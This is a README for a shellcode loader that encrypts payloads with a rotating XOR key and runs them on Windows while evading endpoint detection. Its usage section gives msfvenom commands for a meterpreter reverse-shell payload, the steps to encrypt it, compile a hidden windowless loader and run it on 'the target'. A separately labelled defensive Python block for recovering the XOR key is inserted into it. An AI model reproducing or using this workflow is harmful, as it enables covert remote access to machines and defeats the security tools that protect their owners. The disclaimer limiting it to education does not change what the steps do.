achnouri/Shellcode-EDR-Evasion-Loader

Shellcode Loader

Python Encrypter + C++ Loader

Features

  • XOR encryption with 8-byte rotating key
  • External payload loading (data.bin)
  • Process detachment: spawns an independent background process (no console window)
  • Memory protection
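
For defenders triaging a data.bin-style blob, the first feature matters: a repeating 8-byte XOR key preserves the plaintext's byte skew in every key-position column, so the key can usually be recovered from the file alone. The Python below is an added example, not code from this repository; it assumes byte i is XORed with key[i % 8] and that 0x00 is the most common plaintext byte, and the sample buffer and key are constructed.

```python
from collections import Counter

KEY_LEN = 8  # key length taken from the README's feature list

# Constructed, inert stand-in for a payload: labelled text plus zero padding.
SAMPLE = (b"CONSTRUCTED-SAMPLE" + b"\x00" * 30) * 20
SAMPLE_KEY = bytes.fromhex("1122334455667788")  # constructed key, not the repo's


def xor_repeat(data, key):
    """Assumed scheme: byte i is XORed with key[i % len(key)]."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def column_bias(blob, key_len=KEY_LEN):
    """Share of each key-position column held by its most common byte.

    Strongly encrypted data shows no dominant byte; repeating-key XOR over
    sparse data keeps the plaintext's skew in every column.
    """
    if len(blob) < key_len:
        raise ValueError("blob shorter than key length")
    shares = []
    for pos in range(key_len):
        column = blob[pos::key_len]
        shares.append(Counter(column).most_common(1)[0][1] / len(column))
    return shares


def recover_key(blob, key_len=KEY_LEN, likely_plain=0x00):
    """Guess key[pos] as the column's most common byte XOR likely_plain."""
    if len(blob) < key_len:
        raise ValueError("blob shorter than key length")
    key = bytearray()
    for pos in range(key_len):
        top_byte = Counter(blob[pos::key_len]).most_common(1)[0][0]
        key.append(top_byte ^ likely_plain)
    return bytes(key)


if __name__ == "__main__":
    blob = xor_repeat(SAMPLE, SAMPLE_KEY)  # stands in for an encrypted data.bin
    print("column bias:", [round(s, 2) for s in column_bias(blob)])
    key = recover_key(blob)
    print("recovered key:", key.hex())
    print("decodes to sample:", xor_repeat(blob, key) == SAMPLE)
```
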

Files:

ShellcodeLoaderEncrypter.py: XOR encryption script
ShellcodeLoader.cpp: Windows loader

Usage

1- Generate shellcode

test payload

msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o payload.bin

reverse shell

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=_ LPORT=_ -f raw -o payload.bin

2- Encryption

python3 ShellLoaderEncrypter.py payload.bin

output:

data.bin : encrypted payload


3- Compile loader

x86_64-w64-mingw32-g++ ShellcodeLoader.cpp -o loader.exe -O2 -s -static -mwindows

4- Execute

Copy loader.exe and data.bin to the target, then run:

C:\> loader.exe



License

MIT License - Educational purpose only

Disclaimer:

Educational purpose. Intended for:

  • security research and education
  • authorized penetration testing engagements
  • malware analysis and defense training
  • understanding EDR evasion concepts

About

Shellcode loader with XOR encryption and EDR evasion techniques. For security research and authorized testing only.
